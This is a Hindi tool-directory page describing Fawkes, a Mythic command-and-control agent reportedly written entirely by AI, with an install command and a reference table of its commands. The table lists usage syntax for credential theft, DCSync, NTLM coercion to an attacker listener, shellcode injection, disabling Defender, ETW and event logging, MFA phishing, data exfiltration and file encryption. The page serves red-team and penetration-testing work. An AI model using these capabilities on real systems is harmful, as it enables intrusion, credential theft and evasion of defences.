Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
fawkes — Fawkes एक golang Mythic C2 Agent है जो पूरी तरह से AI द्वारा लिखा गया है। | Kitploit
उपकरण/GitHubGitHub/galoryber/fawkes
रक्षात्मक उपकरणभेद्यता परीक्षण फ्रेमवर्कविशेषाधिकार वृद्धिशोषण फ्रेमवर्कपार्श्व आंदोलनपोस्ट-शोषणक्लाउड सुरक्षाकमांड एंड कंट्रोलपेलोड डेवलपमेंटकंटेनर एस्केप
GitHubgaloryber/fawkes
3561 महीना पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

fawkes

Fawkes एक golang Mythic C2 Agent है जो पूरी तरह से AI द्वारा लिखा गया है।

रिपॉजिटरी देखें

Fawkes Mythic C2 Agent

Fawkes एक पूरी तरह से वाइब-कोडेड Mythic C2 एजेंट है। यह एक "मुझे आश्चर्य है" के रूप में शुरू हुआ और एक लक्ष्य में बदल गया है। मेरा लक्ष्य इस एजेंट के लिए एक भी लाइन कोड नहीं लिखना है, बल्कि इसे विशेष रूप से एक प्रॉम्प्ट पर तैयार करना है।

मैंने मूल रूप से स्वयं एजेंट लिखने का प्रयास किया, लेकिन उदाहरण कंटेनर को क्लोन करने, mythic दस्तावेज़ पढ़ने, डेव सीरीज़ YouTube वीडियो देखने, और Merlin या Freyja जैसे अन्य एजेंटों से कोड कॉपी करने के बाद, मैंने तय किया कि मेरे पास अपना स्वयं का एजेंट विकसित करने का समय नहीं है। हालांकि एक प्रॉम्प्ट, उसके लिए मेरे पास समय है।

Fawkes एक golang-आधारित एजेंट है जिसमें क्रॉस-प्लेटफ़ॉर्म क्षमताएँ हैं। यह Windows (EXE, DLL, और शेलकोड पेलोड), Linux (ELF बाइनरी और साझा लाइब्रेरीज़), और macOS (Intel और Apple Silicon के लिए Mach-O बाइनरी) का समर्थन करता है। कुल 213 कमांड: 113 क्रॉस-प्लेटफ़ॉर्म, 82 केवल Windows, 21 केवल Unix, 11 केवल Linux, और 6 केवल macOS (कुछ कमांड में प्लेटफ़ॉर्म-विशिष्ट कार्यान्वयन होते हैं जो एक ही उपयोगकर्ता-सामना वाले नाम साझा करते हैं, जैसे screenshot)। आंतरिक पिवोटिंग के लिए HTTP एग्रेस और TCP पीयर-टू-पीयर (P2P) लिंकिंग का समर्थन करता है।

स्थापना

Fawkes को स्थापित करने के लिए, आपको एक दूरस्थ कंप्यूटर पर Mythic स्थापित करने की आवश्यकता होगी। आप Mythic प्रोजेक्ट पेज पर Mythic के लिए स्थापना निर्देश पा सकते हैं।

Mythic स्थापना निर्देशिका से:``` ./mythic-cli install github https://github.com/galoryber/fawkes

root@kitploit:~
## कमांड्स त्वरित संदर्भCommand | Syntax | Description
------- | ------ | -----------
acl-edit | `acl-edit -action read -server dc01 -target user` | Active Directory ऑब्जेक्ट DACLs पढ़ें/संशोधित करें (ACEs जोड़ें/हटाएं, DCSync, GenericAll, बैकअप/रीस्टोर दें)। क्रॉस-प्लेटफ़ॉर्म (T1222.001, T1098, T1003.006)।
adcs | `adcs -action <cas\|templates\|find\|request\|auto-exploit> -server <DC> -username <user@domain> -password <pass> [-ca_name <CA>] [-template <name>] [-alt_name <UPN>]` | AD प्रमाणपत्र सेवाएं गणना करें, संवेदनशील टेम्पलेट खोजें (ESC1-ESC4, DCOM के माध्यम से ESC6), DCOM के माध्यम से ESC1/ESC6 शोषण के लिए प्रमाणपत्र अनुरोध करें, या स्वचालित शोषण (खोजें → पार्स करें → अनुरोध श्रृंखला)। क्रॉस-प्लेटफ़ॉर्म (T1649)।
ads | `ads -action <write\|read\|list\|delete> -file <path> [-stream <name>] [-data <content>] [-hex true]` | **(केवल विंडोज)** NTFS वैकल्पिक डेटा स्ट्रीम प्रबंधित करें — छिपे हुए डेटा स्ट्रीम लिखें, पढ़ें, सूचीबद्ध करें या हटाएं। टेक्स्ट और हेक्स-एन्कोडेड बाइनरी का समर्थन करता है। MITRE T1564.004।
amcache | `amcache -action <query\|search\|delete\|clear> [-name <pattern>] [-count <n>]` | फोरेंसिक निष्पादन कलाकृतियों को क्वेरी और साफ करें। विंडोज: Shimcache. लिनक्स: recently-used.xbel, थंबनेल, Tracker. मैकओएस: हाल की वस्तुएं, KnowledgeC, क्वारंटीन (T1070.004)।
apc-injection | `apc-injection [-method <apc\|hwbp>] -pid <PID> [-tid <TID>] [-target_api ntdll!NtDelayExecution] [-timeout_ms 30000]` | **(केवल विंडोज)** रिमोट प्रक्रिया इंजेक्शन। `-method apc` (डिफ़ॉल्ट) NtQueueApcThread के माध्यम से शेलकोड को एक सतर्क थ्रेड में कतारबद्ध करता है (एक खोजने के लिए `ts` का उपयोग करें)। `-method hwbp` DebugActiveProcess के माध्यम से जुड़ता है, एक लक्ष्य API पर एक DR0 हार्डवेयर ब्रेकपॉइंट सेट करता है (डिफ़ॉल्ट `ntdll!NtDelayExecution`), और ब्रेकपॉइंट फायर होने पर Rip को शेलकोड पर रीडायरेक्ट करता है — कोई TID आवश्यक नहीं, कोई APC कतार नहीं, कोई CreateRemoteThread नहीं (T1055.004, T1055)।
audio-capture | `audio-capture [-duration 10] [-sample_rate 16000] [-channels 1] [-device default]` | माइक्रोफोन से ऑडियो रिकॉर्ड करें और WAV फ़ाइल अपलोड करें। विंडोज (waveIn), लिनक्स (arecord/parecord), मैकओएस (rec/ffmpeg). क्रॉस-प्लेटफ़ॉर्म (T1123)।
auditpol | `auditpol -action <query\|disable\|enable\|stealth> [-category <name\|all>]` | **(केवल विंडोज)** विंडोज ऑडिट नीतियों को क्वेरी और संशोधित करें। संवेदनशील संचालन से पहले सुरक्षा ईवेंट लॉगिंग अक्षम करें। स्टेल्थ मोड डिटेक्शन-महत्वपूर्ण उपश्रेणियों को अक्षम करता है। AuditQuerySystemPolicy API का उपयोग करता है (T1562.002)।
argue | `argue -command "cmd.exe /c whoami" -spoof "cmd.exe /c echo hello"` | **(केवल विंडोज)** स्पूफ़ किए गए प्रक्रिया तर्कों के साथ एक कमांड निष्पादित करें। Sysmon Event ID 1 और EDR कमांड-लाइन टेलीमेट्री को विफल करता है (T1564.010)।
arp | `arp [-ip <subnet>]` or `arp -action spoof -target <IP> -gateway <IP>` | फ़िल्टरिंग के साथ ARP तालिका प्रदर्शित करें, या MITM स्थिति के लिए ARP कैश विषाक्तता (T1557.002). स्पूफ़: केवल लिनक्स, सफाई पर पुनर्स्थापित करता है।
asrep-roast | `asrep-roast -server <DC> -username <user@domain> -password <pass> [-account <target>]` | बिना पूर्व-प्रमाणीकरण वाले खातों के लिए AS-REP टिकट का अनुरोध करें और ऑफ़लाइन क्रैकिंग के लिए हैशकैट प्रारूप में हैश निकालें। LDAP के माध्यम से स्वचालित गणना। क्रॉस-प्लेटफ़ॉर्म (T1558.004)।
av-detect | `av-detect [-deep true]` | 130+ हस्ताक्षर डेटाबेस के विरुद्ध चल रही प्रक्रियाओं को स्कैन करके स्थापित AV/EDR/सुरक्षा उत्पादों का पता लगाएं। `--deep` के साथ, स्थापित-लेकिन-चालू-नहीं उत्पादों के लिए कर्नेल मॉड्यूल, systemd यूनिट्स और कॉन्फिग डायरेक्टरी की भी जांच करता है (लिनक्स)। उत्पाद, विक्रेता, प्रकार और PID रिपोर्ट करता है। क्रॉस-प्लेटफ़ॉर्म।
autopatch | `autopatch <dll_name> <function_name> <num_bytes>` | **(केवल विंडोज)** निकटतम रिटर्न (C3) निर्देश पर कूदकर स्वचालित रूप से एक फ़ंक्शन को पैच करें। AMSI/ETW बायपास के लिए उपयोगी।
base64 | `base64 -action <encode\|decode\|xor\|hex\|hex-decode\|rot13\|url\|url-decode\|caesar> -input <data> [-key <key>] [-shift <N>] [-file true] [-output <path>]` | डेटा एन्कोडिंग टूलकिट: base64, XOR (स्ट्रिंग/हेक्स कुंजी के साथ), हेक्स, ROT13, URL प्रतिशत-एन्कोडिंग, सीज़र सिफर। सभी फ़ाइल I/O का समर्थन करते हैं। क्रॉस-प्लेटफ़ॉर्म (T1132.001, T1140, T1027)।
bits | `bits -action <list\|create\|persist\|cancel\|suspend\|resume\|complete> [-name <job>] [-url <URL>] [-path <local>] [-command <exe>]` | **(केवल विंडोज)** स्थिरता और गुप्त फ़ाइल डाउनलोड के लिए BITS स्थानांतरण कार्य प्रबंधित करें। कार्य बनाएं, निलंबित करें, फिर से शुरू करें, पूर्ण करें और स्थिरता के लिए अधिसूचना कमांड सेट करें। कार्य रिबूट से बचे रहते हैं (T1197)।
browser | `browser [-action <passwords\|cookies\|history\|autofill\|bookmarks\|downloads>] [-browser <all\|chrome\|edge\|chromium\|firefox>]` | Chromium, Firefox और Safari से ब्राउज़र डेटा एकत्र करें। इतिहास, ऑटोफिल, बुकमार्क, डाउनलोड क्रॉस-प्लेटफ़ॉर्म। पासवर्ड: Chromium (DPAPI/Keychain/GNOME Keyring), Firefox (key4.db NSS डिक्रिप्शन), Safari (macOS Keychain)। सभी प्लेटफ़ॉर्म पर Firefox कुकीज़। MITRE T1555.003, T1217।
cat | `cat <file>` or `cat -path <file> -start N -end N -number true` | वैकल्पिक पंक्ति श्रेणी, क्रमांकन और 5MB आकार सुरक्षा के साथ फ़ाइल सामग्री प्रदर्शित करें।
cd | `cd <directory>` | वर्तमान कार्यशील निर्देशिका बदलें।
chmod | `chmod -path <file> -mode <permissions> [-recursive true]` | ऑक्टल (755, 644) या प्रतीकात्मक (+x, u+rw, go-w) संकेतन के साथ फ़ाइल/निर्देशिका अनुमतियाँ संशोधित करें। पुनरावर्ती समर्थन। क्रॉस-प्लेटफ़ॉर्म (T1222)।
chown | `chown -path <file> -owner <user> [-group <group>] [-recursive true]` | **(केवल लिनक्स/मैकओएस)** उपयोगकर्ता नाम/UID और समूह नाम/GID द्वारा फ़ाइल/निर्देशिका स्वामित्व बदलें। पुनरावर्ती समर्थन (T1222)।
cert-check | `cert-check -host <hostname> [-port 443] [-timeout 10]` | रिमोट होस्ट पर TLS प्रमाणपत्रों का निरीक्षण करें — CA, स्व-हस्ताक्षरित प्रमाणपत्र, समाप्ति, SANs, TLS संस्करण, सिफर सूट और SHA256 फिंगरप्रिंट की पहचान करता है। क्रॉस-प्लेटफ़ॉर्म (T1590.001)।
certstore | `certstore -action <list\|find> [-store <MY\|ROOT\|CA\|Trust\|TrustedPeople>] [-filter <substring>]` | **(केवल विंडोज)** कोड साइनिंग प्रमाणपत्र, क्लाइंट प्रमाणीकरण प्रमाणपत्र और निजी कुंजी खोजने के लिए विंडोज प्रमाणपत्र स्टोर गणना करें। CurrentUser और LocalMachine खोजता है। MITRE T1552.004, T1649।
clipboard | `clipboard -action <read\|write\|monitor\|dump\|stop> [-data "text"] [-interval 3]` | क्लिपबोर्ड पढ़ें/लिखें या क्रेडेंशियल पैटर्न पहचान के साथ परिवर्तनों की लगातार निगरानी करें। क्रॉस-प्लेटफ़ॉर्म (T1115)।
cloud-metadata | `cloud-metadata -action <detect\|creds\|storage\|aws-iam\|azure-graph\|gcp-iam\|aws-s3\|azure-blob\|gcp-gcs\|aws-persist\|azure-persist\|aws-ssm\|azure-keyvault\|gcp-secrets\|...> [-provider <auto\|aws\|azure\|gcp\|do>]` | क्लाउड मेटाडेटा, क्रेडेंशियल निष्कर्षण, IAM गणना, स्टोरेज गणना, स्थिरता और गुप्त स्टोर एक्सेस। storage/aws-s3/azure-blob/gcp-gcs: नमूना ऑब्जेक्ट के साथ बकेट/कंटेनर गणना। aws-ssm: डिक्रिप्शन के साथ SSM पैरामीटर स्टोर। azure-keyvault: प्रबंधित पहचान के माध्यम से Key Vault रहस्य। gcp-secrets: सेवा खाते के माध्यम से सीक्रेट मैनेजर। aws-persist/azure-persist: दीर्घकालिक एक्सेस कुंजी/ऐप पंजीकरण बनाएं। स्वचालित पहचान। IMDSv2. क्रॉस-प्लेटफ़ॉर्म (T1552.005, T1580, T1530, T1098.001)।
compress | `compress -action <create\|list\|extract\|stage\|exfil\|stage-exfil\|exfil-https\|exfil-github> -path <path> [-format zip\|tar.gz] [-output <out>] [-pattern *.txt] [-cleanup true]` | आर्काइव बनाएं, सूचीबद्ध करें, निकालें, स्टेज या एक्सफिल करें। Stage AES-256-GCM के साथ एन्क्रिप्ट करता है। Exfil Mythic को स्थानांतरित करता है। exfil-https: चंक्ड अपलोड, कस्टम हेडर, जिटर के साथ S3/Azure/GCS प्री-साइन URL पर अपलोड करें। exfil-github: GitHub कंटेंट API के माध्यम से एक्सफिल करें। क्रॉस-प्लेटफ़ॉर्म (T1560.001, T1074.001, T1041, T1048, T1567, T1567.001)।
coerce | `coerce -server <target> -listener <attacker-ip> [-method petitpotam\|printerbug\|shadowcoerce\|all] -username <user> [-password <pass>] [-hash <NT hash>] [-domain <domain>]` | MS-EFSR (PetitPotam), MS-RPRN (PrinterBug), MS-FSRVP (ShadowCoerce) के माध्यम से NTLM प्रमाणीकरण ज़बरदस्ती। लक्ष्य को अटैकर लिसनर पर प्रमाणित करने के लिए मजबूर करता है। पास-द-हैश समर्थन। क्रॉस-प्लेटफ़ॉर्म (T1187)।
config | `config [-action show\|set\|update] [-key sleep\|jitter\|killdate\|working_hours_start\|working_hours_end\|working_days] [-value <val>] [-file <binary>] [-hash <sha256>]` | रनटाइम एजेंट कॉन्फ़िगरेशन देखें या संशोधित करें, या एजेंट बाइनरी को स्वयं-अपडेट करें। `show`/`set`: sleep, jitter, kill date, कार्य घंटे। `update`: Mythic से नया पेलोड डाउनलोड करें, सत्यापित करें, लॉन्च करें और वर्तमान एजेंट से बाहर निकलें। क्रॉस-प्लेटफ़ॉर्म (T1105)।
container-detect | `container-detect` | कंटेनर रनटाइम और वातावरण का पता लगाएं (Docker, K8s, LXC, Podman, WSL)। डॉकर सॉकेट और K8s सेवा खातों जैसे एस्केप वैक्टर की जांच करता है। क्रॉस-प्लेटफ़ॉर्म (T1082, T1497.001)।
container-escape | `container-escape -action <check\|docker-sock\|cgroup\|nsenter\|mount-host\|k8s-enum\|k8s-secrets\|k8s-rbac\|k8s-nodes\|k8s-etcd\|k8s-deploy\|k8s-exec> [-command '<cmd>'] [-path <ns>\|<ns1,ns2,...>\|*] [-kubeconfig /path/to/config]` | **(केवल लिनक्स)** कंटेनर ब्रेकआउट + K8s ऑपरेशन — डॉकर सॉकेट, cgroup, nsenter, होस्ट डिवाइस माउंट। K8s: पॉड/सेवाएं गणना करें, रहस्य पढ़ें, **k8s-rbac**: ClusterRole/RoleBinding स्वीप + विशेषाधिकार-वृद्धि पथ स्कोरिंग (crit/warn/info), **k8s-nodes**: क्लस्टर नोड हमला सतह (kubelet/OS/kernel/CIDR/taints/roles), **k8s-etcd**: कंट्रोल-प्लेन पॉड आर्ग्स से etcd क्लाइंट एंडपॉइंट खोजें + प्रति एंडपॉइंट अनप्रमाणित `/version` जांच (अनप्रमाणित पढ़ना = पूर्ण क्लस्टर समझौता), API के माध्यम से पॉड डिफ़ॉइ/एक्सेक करें। **आउट-ऑफ-क्लस्टर**: `-kubeconfig` चुराए गए kubeconfig फ़ाइलों को स्वीकार करता है (गैर-कंटेनर होस्ट से K8s एक्सेस के लिए) (T1611, T1610, T1613, T1552.007, T1069.003, T1087.004)।
cp | `cp <source> <destination>` | किसी फ़ाइल को स्रोत से गंतव्य पर कॉपी करें।
cred-check | `cred-check [-action check\|verify-all] -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-timeout <seconds>]` | लक्ष्य होस्ट पर SMB, WinRM और LDAP के विरुद्ध क्रेडेंशियल का परीक्षण करें। `verify-all` सभी वॉल्ट क्रेडेंशियल्स का समानांतर में खोजे गए होस्ट के विरुद्ध परीक्षण करता है। क्रॉस-प्लेटफ़ॉर्म (T1110.001, T1078)।
cred-harvest | `cred-harvest -action <shadow\|cloud\|configs\|history\|windows\|m365-tokens\|browser-live\|all\|dump-all> [-user <username>]` | क्रेडेंशियल एकत्र करें: छाया हैश (Unix), क्लाउड कॉन्फ़िग (AWS/GCP/Azure/K8s), एप्लिकेशन रहस्य, लीक पासवर्ड/टोकन/API कुंजी के लिए शेल हिस्ट्री स्कैनिंग, पावरशेल हिस्ट्री + एनवी वेर + RDP (विंडोज), TokenBroker/Teams/Outlook से M365 OAuth/JWT टोकन (विंडोज), **browser-live**: चल रहे Chrome/Edge से Chrome DevTools Protocol (CDP) के माध्यम से लाइव कुकीज़, localStorage, sessionStorage चुराएं। **dump-all**: स्वचालित उपकार्य श्रृंखला — hashdump + lsa-secrets + cred-harvest सभी समानांतर में चलाता है (विंडोज). क्रॉस-प्लेटफ़ॉर्म (T1552, T1003.008, T1528, T1539)।
credential-prompt | `credential-prompt [-action dialog\|device-code\|mfa-phish] [-title "Authentication Required"] [-message "Enter your credentials..."] [-icon caution]` | मूल क्रेडेंशियल डायलॉग प्रदर्शित करें, OAuth डिवाइस कोड फ़्लो का दुरुपयोग करें, या MFA कोड फ़िश करें। dialog: macOS AppleScript, विंडोज CredUI, लिनक्स zenity/kdialog. device-code: टोकन कैप्चर के लिए Azure AD OAuth डिवाइस कोड फ़्लो। mfa-phish: TOTP कोड कैप्चर करने के लिए नकली MFA सत्यापन डायलॉग। क्रॉस-प्लेटफ़ॉर्म (T1056.002, T1621, T1111)।
curl | `curl -url <URL> [-method GET\|PUT\|POST] [-file <path>] [-upload raw\|multipart] [-headers '{"K":"V"}'] [-body <data>]` | HTTP अनुरोध + फ़ाइल अपलोड एक्सफिल्ट्रेशन (T1567). S3 प्री-साइन URL, Azure SAS, सामान्य एंडपॉइंट पर अपलोड करें। क्रॉस-प्लेटफ़ॉर्म (T1106, T1567.002)।
cut | `cut -path <file> -delimiter <char> -fields <1,3\|1-3\|2-> [-chars <1-10>]` | फ़ाइल पंक्तियों से फ़ील्ड या वर्ण श्रेणियाँ निकालें। कस्टम डिलीमीटर, रेंज स्पेक। क्रॉस-प्लेटफ़ॉर्म (T1083)।
credman | `credman [-action <list\|dump\|vault>] [-filter <pattern>]` | प्लेटफ़ॉर्म क्रेडेंशियल स्टोर गणना करें। विंडोज: क्रेडेंशियल मैनेजर + वॉल्ट (CredEnumerateW, vaultcli.dll). लिनक्स: GNOME कीरिंग (secret-tool), KDE KWallet, NetworkManager WiFi/VPN पासवर्ड, GNOME ऑनलाइन खाते। macOS: कीचेन आइटम (सामान्य + इंटरनेट पासवर्ड), WiFi पासवर्ड। `list`=मेटाडेटा, `dump`=रहस्यों के साथ, `vault`=केवल विंडोज। MITRE T1555.004, T1555.001.
defender | `defender -action <status\|exclusions\|add-exclusion\|remove-exclusion\|threats\|enable\|disable> [-type <path\|process\|extension>] [-value <val>]` | **(केवल विंडोज)** डिफेंडर प्रबंधित करें — स्थिति, अपवाद, खतरे, रीयल-टाइम सुरक्षा सक्षम/अक्षम करें। MITRE T1562.001.
dpapi | `dpapi -action <decrypt\|masterkeys\|chrome-key> [-blob <base64>] [-entropy <base64>]` | **(केवल विंडोज)** DPAPI ब्लॉब डिक्रिप्शन (CryptUnprotectData), मास्टर की गणना, Chrome/Edge एन्क्रिप्शन की निकासी। MITRE T1555.003/T1555.005.
email | `email -action <count\|search\|read\|folders> [-folder <name>] [-query <keyword>] [-index <n>]` | **(केवल विंडोज)** COM के माध्यम से आउटलुक मेलबॉक्स एक्सेस करें। संदेश गिनें, कीवर्ड द्वारा खोजें, अनुक्रमणिका द्वारा पढ़ें, फ़ोल्डर सूचीबद्ध करें। MITRE T1114.001.
dcom | `dcom -action <exec\|upload\|exec-staged\|check> -host <target> -command <cmd> [-args <arguments>] [-object mmc20\|shellwindows\|shellbrowser\|wscript\|excel\|outlook]` | **(केवल विंडोज)** DCOM के माध्यम से रिमोट होस्ट पर कमांड निष्पादित करें, फ़ाइलें अपलोड करें, या स्टेज-एंड-एक्ज़ीक्यूट करें। `check` RPC/DCOM पूर्वापेक्षाएँ मान्य करता है। upload: certutil/PowerShell स्टेजिंग के माध्यम से फ़ाइलें स्थानांतरित करें। exec-staged: ऑटो-क्लीनअप के साथ अपलोड करें फिर निष्पादित करें। छह COM ऑब्जेक्ट। MITRE T1021.003, T1570.
debug-detect | `debug-detect` | संलग्न डीबगर्स, विश्लेषण उपकरण और इंस्ट्रुमेंटेशन का पता लगाएं। विंडोज: IsDebuggerPresent, NtQueryInformationProcess, PEB, DR रजिस्टर। लिनक्स: TracerPid, LD_PRELOAD, मेमोरी मैप (Frida/Valgrind/sanitizers), VM/sandbox, eBPF निगरानी (Falco/Tetragon/Tracee), auditd फ्रेमवर्क, ptrace स्कोप। macOS: sysctl P_TRACED, DYLD_INSERT_LIBRARIES, VM डिटेक्शन (sysctl), सुरक्षा उत्पाद (EDR/AV), सैंडबॉक्स/विश्लेषण वातावरण। सभी: डीबगर प्रक्रिया स्कैन (T1497.001)।
dcsync | `dcsync [-action sync\|domain-takeover] -server <DC> -username <user> [-password <pass>] [-hash <NT hash>] [-target <account[,account2]>]` | DCSync — LSASS को छुए बिना DRS के माध्यम से AD क्रेडेंशियल्स को प्रतिकृति करें। `domain-takeover` kerberoast + asrep-roast + dcsync krbtgt/Administrator समानांतर में चलाता है। क्रॉस-प्लेटफ़ॉर्म (T1003.006)।
df | `df [-filesystem <device>] [-mount_point <path>] [-fstype <type>]` | वैकल्पिक डिवाइस, माउंट पॉइंट या fstype फ़िल्टरिंग के साथ फ़ाइलसिस्टम डिस्क स्थान उपयोग रिपोर्ट करें। क्रॉस-प्लेटफ़ॉर्म (T1082)।
diff | `diff -file1 <path> -file2 <path> [-context <n>]` | दो फ़ाइलों की तुलना करें और एकीकृत diff प्रारूप में अंतर दिखाएं। LCS-आधारित एल्गोरिथम कॉन्फ़िगरेबल संदर्भ पंक्तियों के साथ। क्रॉस-प्लेटफ़ॉर्म (T1083)।
dns | `dns -action <resolve\|reverse\|srv\|mx\|ns\|txt\|cname\|all\|dc\|zone-transfer\|wildcard\|exfil\|doh> -target <host> [-server <dns_ip>]` | DNS गणना — होस्ट हल करें, रिकॉर्ड क्वेरी करें, DC खोजें, ज़ोन ट्रांसफर, वाइल्डकार्ड डिटेक्शन, DNS-ओवर-HTTPS स्टील्थ रिज़ॉल्यूशन, DNS एक्सफिल्ट्रेशन। क्रॉस-प्लेटफ़ॉर्म (T1018, T1071.004, T1048.001)।
du | `du -path <file_or_dir> [-max_depth <n>]` | फ़ाइलों और निर्देशिकाओं के लिए डिस्क उपयोग रिपोर्ट करें। उपनिर्देशिका द्वारा आकार विवरण, सबसे बड़े द्वारा क्रमबद्ध। क्रॉस-प्लेटफ़ॉर्म (T1083)।
drivers | `drivers [-filter <name>]` | लोडेड कर्नेल ड्राइवर/मॉड्यूल गणना करें। विंडोज: EnumDeviceDrivers, लिनक्स: /proc/modules, macOS: kext गणना। क्रॉस-प्लेटफ़ॉर्म (T1082)।
domain-policy | `domain-policy -action <all\|password\|lockout\|fgpp> -server <DC> -username <user@domain> -password <pass>` | LDAP के माध्यम से AD पासवर्ड/लॉकआउट नीति और FGPP गणना। स्प्रे-सुरक्षित सुझाव। क्रॉस-प्लेटफ़ॉर्म (T1201)।
crontab | `crontab -action <list\|add\|remove> [-entry <cron_line>] [-program <path>] [-schedule <schedule>]` | **(केवल लिनक्स/मैकओएस)** स्थिरता के लिए क्रॉन जॉब सूचीबद्ध करें, जोड़ें या हटाएं। रॉ क्रॉन एंट्री या प्रोग्राम+शेड्यूल सिंटैक्स का समर्थन करता है।
download | `download <path>` or `download {"path": "/file", "compress": true}` | लक्ष्य से कोई फ़ाइल या निर्देशिका डाउनलोड करें। 1MB से बड़ी फ़ाइलें स्वचालित रूप से gzip के साथ संपीड़ित होती हैं (कॉन्फ़िगरेबल)। निर्देशिकाएं स्वचालित रूप से ज़िप की जाती हैं। SHA256 हैश सत्यापन। चंक्ड ट्रांसफर, फ़ाइल ब्राउज़र एकीकरण।
drives | `drives` | प्रकार, लेबल/डिवाइस और मुक्त/कुल स्थान के साथ उपलब्ध ड्राइव/वॉल्यूम और माउंटेड फ़ाइलसिस्टम सूचीबद्ध करें।
enum-tokens | `enum-tokens [-action list\|unique] [-user <filter>]` | **(केवल विंडोज)** सभी प्रक्रियाओं में एक्सेस टोकन गणना करें। `list` प्रत्येक प्रक्रिया के लिए PID/user/integrity/session दिखाता है। `unique` प्रक्रिया गणना के साथ उपयोगकर्ता द्वारा समूहित करता है। स्वचालित रूप से SeDebugPrivilege सक्षम करता है (T1134, T1057)।
encrypt | `encrypt -action <encrypt\|decrypt\|encrypt-files\|decrypt-files\|corrupt\|corrupt-files> -path <file_or_glob> [-key <base64key>] [-confirm SIMULATE\|CORRUPT]` | AES-256-GCM एन्क्रिप्शन/डिक्रिप्शन (T1486) + लक्षित फ़ाइल भ्रष्टाचार (T1565). corrupt: फ़ाइल हेडर को यादृच्छिक डेटा से ओवरराइट करें। विनाशकारी ऑप्स के लिए सुरक्षा गेट आवश्यक है।
env | `env [-action <list\|get\|set\|unset>] [-name <VAR>] [-value <val>] [-filter <pattern>]` | एजेंट प्रक्रिया के लिए पर्यावरण चर सूचीबद्ध करें, प्राप्त करें, सेट करें या अनसेट करें। परिवर्तन चाइल्ड प्रक्रियाओं द्वारा विरासत में मिलते हैं। क्रॉस-प्लेटफ़ॉर्म।
env-scan | `env-scan [-pid <PID>] [-filter <pattern>]` | लीक क्रेडेंशियल्स, API कुंजी और रहस्यों के लिए प्रक्रिया पर्यावरण चर स्कैन करें। क्लाउड, डेटाबेस, CI/CD और क्रिप्टो श्रेणियों में 35+ डिटेक्शन पैटर्न। लिनक्स + macOS (T1057, T1552.001)।
etw | `etw -action <sessions\|rules\|agents\|patch\|restore\|blind-all\|...> [-session_name <name>] [-provider <guid\|shorthand>]` | **(विंडोज, लिनक्स, मैकओएस)** ऑडिट/टेलीमेट्री सबसिस्टम हेरफेर। विंडोज: ETW सेशन/प्रोवाइडर स्टॉप/ब्लाइंड/ब्लाइंड-ऑल/इनेबल/पैच/रीस्टोर। लिनक्स: auditd नियम, journald क्लियर/रोटेट, syslog कॉन्फिग, SIEM एजेंट डिटेक्शन। macOS: यूनिफाइड लॉगिंग, सुरक्षा एजेंट डिटेक्शन। (T1562, T1070.002)।
eventlog | `eventlog -action <list\|query\|clear\|info\|enable\|disable> [-channel <name\|unit\|subsystem\|path>] [-event_id <id>] [-filter <xpath\|keyword\|timewindow>] [-count <max>]` | सिस्टम ईवेंट लॉग प्रबंधित करें। विंडोज: wevtapi.dll चैनल। लिनक्स: journald यूनिट और syslog फ़ाइलें। macOS: यूनिफाइड लॉगिंग (os_log) सबसिस्टम/प्रक्रियाएं। स्रोत सूचीबद्ध करें, ईवेंट क्वेरी करें, लॉग साफ़/वैक्यूम करें, जानकारी प्राप्त करें। MITRE T1070.001, T1562.002.
execute-memory | `execute-memory -arguments 'arg1 arg2' -timeout 60` | मेमोरी से एक मूल बाइनरी निष्पादित करें। लिनक्स: memfd_create (कोई डिस्क लेखन नहीं)। macOS: एड-हॉक कोडसाइन के साथ अस्थायी फ़ाइल। विंडोज: तत्काल सफाई के साथ अस्थायी फ़ाइल। सभी प्लेटफ़ॉर्म निष्पादन के बाद कलाकृतियाँ हटाते हैं। MITRE T1620.
execute-shellcode | `execute-shellcode [-technique mmap\|memfd] [-encoding none\|xor\|aes] [-key hex]` | वर्तमान प्रक्रिया में शेलकोड निष्पादित करें। रनटाइम डिकोडिंग के साथ XOR/AES-256-CTR एन्कोडेड शेलकोड का समर्थन करता है (T1027). विंडोज: VirtualAlloc + CreateThread. लिनक्स: mmap (डिफ़ॉल्ट) या memfd_create. macOS: MAP_JIT (ARM64) या mmap. क्रॉस-प्लेटफ़ॉर्म (T1059.006, T1620).
exit | `exit` | एजेंट को बाहर निकलने का कार्य देता है।
file-attr | `file-attr -path <file> [-attrs "+hidden,-readonly,+immutable"]` | फ़ाइल विशेषताएँ प्राप्त या सेट करें — hidden, readonly, system (विंडोज); immutable, append, nodump (लिनक्स); hidden, immutable (macOS). -attrs छोड़ें वर्तमान फ़्लैग देखने के लिए। क्रॉस-प्लेटफ़ॉर्म (T1564.001, T1222)।
file-type | `file-type -path <file_or_dir> [-recursive true] [-max_files 100]` | मैजिक बाइट्स (35+ हस्ताक्षर) द्वारा फ़ाइल प्रकार पहचानें। एकल फ़ाइल या निर्देशिका स्कैनिंग। एक्जीक्यूटेबल, आर्काइव, दस्तावेज़, इमेज, डेटाबेस, मीडिया और अधिक का पता लगाता है। क्रॉस-प्लेटफ़ॉर्म (T1083)।
find | `find -pattern <glob> [-path <dir>] [-min_size <bytes>] [-max_size <bytes>] [-newer <min>] [-older <min>] [-type f\|d] [-perm suid\|sgid\|writable\|executable\|<octal>] [-owner <user\|uid>]` | नाम, आकार, दिनांक, अनुमतियाँ या स्वामी द्वारा फ़ाइलें खोजें। SUID बाइनरी, विश्व-लेखन योग्य फ़ाइलें, विशिष्ट उपयोगकर्ताओं के स्वामित्व वाली फ़ाइलें खोजें। क्रॉस-प्लेटफ़ॉर्म (T1083)।
